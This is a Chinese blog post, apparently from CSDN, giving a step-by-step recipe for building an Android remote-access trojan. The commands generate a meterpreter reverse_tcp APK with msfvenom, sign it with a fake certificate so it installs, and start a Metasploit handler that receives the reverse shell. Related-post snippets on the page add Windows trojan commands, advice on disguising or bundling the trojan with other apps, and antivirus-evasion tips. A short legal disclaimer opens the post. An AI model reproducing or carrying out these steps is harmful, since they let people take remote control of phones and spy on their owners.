网安学习笔记 6 ---- 安卓木马软件的使用(复杂版)

已于 2023-09-12 19:40:57 修改
阅读量610 收藏 7
点赞数 2
分类专栏: 渗透操作类 文章标签: 学习 笔记
于 2023-09-12 18:08:35 首次发布
1
本文链接:https://blog.csdn.net/ymy13326056686/article/details/132831966
版权

2023.9.12

注意:在进行安全研究和学习时,请确保遵循相关法律法规并获得授权,以避免非法操作或侵犯他人隐私。这些步骤仅供学习和研究使用,不得用于非法用途。

一、生成文件 

1、利用 kali 的工具 msfvenom 生成一个木马文件

msfvenom -p android/meterpreter/reverse_tcp lhost=<kali ip> lport=<自定义端口> R > muma.apk

二、重新对齐、签名

1、赋予apk文件权限

chmod -R 777 muma.apk

ps:查看文件权限

ll muma.apk

2、安装 zipalign

apt-get install zipalign

3、重新对apk文件进行对齐,签名成一个新的apk文件

zipalign -v 4 muma.apk new_muma.apk

4、生成密钥对

keytool -genkey -v -keystore <密钥库名> -alias <密钥别名> -keyalg RSA -keysize <秘钥位数> -validity <有效天数>

5、安装证书签名命令

apt-get install apksigner

 6、对 apk 签名  ps:做假证书签名的时候要输入之前做的假证书的密码

apksigner sign --ks <密钥库名> --ks-key-alias <密钥别名> <木马文件名>

7、验证签名

apksigner verify -v --print-certs <木马文件名>

三、测试 

1、msf模块运行

msfconsole
use exploit/multi/handler
set payload  android/meterpreter/reverse_tcp
set lhost <kali ip>
set lport <和木马软件的端口一样>
run

Z时代.bug(゜▽゜*)
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
msfvenom生成木马的简单利用
xj28555的博客
08-10 5581
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lpor.
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 4354
使用kali制作Android木马并进行通讯录渗透的学习笔记
Metasploit远程控制安卓手机,jarsigner(工具找不到)签名使用问题zipalign(工具)及解决方法
边城浪子的博客
08-14 5129
问题点: 1.kali linux2020.3本,在使用msf生成安卓木马时远控手机,签名时需要3个工具,分别是keytool,jarsigner,zipalign,只提示有keytool工具,jarsigner和zipalign工具找不到. 2.在模拟器中成功,但很多命令执行不成功,在手机上面直接不成功。 解决方法: step1: 命令:keytool -h 提示成功执行,因为keytool集成在了kali linux 中。 step2:命令:jarsigner -h ..
MSF手机渗透实验
weixin_63204687的博客
10-22 4234
可真刑,太可拷了
Kali Linux利用MSF入侵安卓手机
weixin_42916109的博客
06-06 6060
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6129
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8656
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此本)虚拟机2. kali虚拟机建议使用最新本并将系统软件更新至最新本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
软件测试-软件测试视频教程学习笔记.zip
最新发布
04-07
软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件测试视频教程学习笔记.zip软件测试-软件...
android学习笔记-clip.pdf
11-15
android学习笔记-clip.pdf
《WebGL编程指南》学习笔记webgl-study-notes
01-12
《WebGL编程指南》学习笔记webgl-study-notes
木马与病毒
03-26
今时今日,一直都有不少的人以为木马和病毒没什么区别,只要安装了杀毒软件,那么就万事无忧了。其实,木马并不等同于病毒,杀毒软件未必就能将隐藏的木马抓出来。下面,我们先来了解下木马与病毒的定义。
Cadence学习笔记1-原理图.pdf
11-16
Cadence学习笔记1-原理图.pdf
2021Kali -- 木马免杀制作
weixin_41489908的博客
04-24 3926
​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF,演示本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c -p:指定payload -e:指定选择使用的编码 ...
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8097
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
手机android.sys木马,使用kali生成木马入侵安卓手机
weixin_42353186的博客
05-29 6444
大家好,我是T0reAd今天给大家带来的是使用kali生成行动开始先查看kali的ip,我的是1.114然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改显示这个说明已经生成成功了然后启动msf:msfconsol...
kali安卓手机木马远控
热门推荐
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
msf生成免杀木马
qq_56426046的博客
09-08 5454
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
渗透学习总结之利用木马渗透攻击安卓手机
ABABC1234的博客
07-09 392
利用exploit/multi/handler渗透攻击安卓手机实验过程
msf生成捆绑安卓木马
05-27
在Metasploit中,可以使用以下步骤生成捆绑安卓木马: 1. 打开Metasploit控制台并输入以下命令启动msfvenom: ``` msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > <output file name>.apk ``` 2. 将`<your IP address>`替换为你的IP地址,将`<your port>`替换为用于与受害者通信的端口号,将`<output file name>`替换为生成的apk文件名。 3. 运行命令后,msfvenom会生成一个APK文件,其中包含与你指定的IP地址和端口号进行通信的Meterpreter反向Shell。 请注意,生成的捆绑安卓木马仅供授权渗透测试使用,未经授权的使用是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Z时代.bug(゜▽゜*)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值